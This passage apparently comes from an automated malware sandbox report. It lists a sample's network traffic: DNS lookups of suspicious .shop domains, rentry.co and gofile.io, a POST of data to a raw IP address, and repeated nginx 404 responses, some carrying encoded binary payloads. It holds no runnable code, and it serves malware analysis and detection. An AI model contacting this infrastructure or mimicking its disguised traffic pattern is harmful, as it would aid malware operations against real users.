Source: global traffic DNS traffic detected: DNS query: callosallsaospz.shop
Source: global traffic DNS traffic detected: DNS query: rentry.co
Source: global traffic DNS traffic detected: DNS query: store4.gofile.io
Source: global traffic DNS traffic detected: DNS query: liernessfornicsa.shop
Source: unknown HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9363
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not 